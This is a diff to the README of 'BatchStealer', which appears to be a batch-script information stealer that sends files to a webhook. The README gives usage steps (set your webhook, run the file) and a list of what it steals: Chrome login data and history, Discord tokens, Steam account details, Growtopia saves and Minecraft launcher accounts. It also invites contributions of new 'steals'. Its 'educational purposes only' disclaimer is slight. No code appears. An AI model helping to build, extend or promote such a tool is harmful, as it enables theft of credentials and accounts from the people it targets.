Takaovi/BatchStealer/README.md

 # BatchStealer

-A batch script for taking files or text and sending them to a webhook
+### A batch script for taking files or text and sending them to a webhook

+It is forbidden to use this batch file for non-educational purposes.
+Use only with permission on your own computers.

 # How to use

 1. Change the webhook to yours
 2. Run the batch file

+# Steals

+* Growtopia
+  * Save.dat
+* Chrome
+  * History
+  * Shortcuts
+  * Bookmarks
+  * Login Data (encrypted)
+* Discord
+  * File containing Token
+* Steam
+  * Logged in users (Username, email)
+* Minecraft
+  * Launcher profiles and accounts (no password)

 # Future

-* More features might come if I am bored.
+* More features come if and when I am bored.

-* Pull requests are welcome!
+# Support

+* If you want to support the project do a pull request.
+  * The pull request could be for a new steal etc.

 # Legal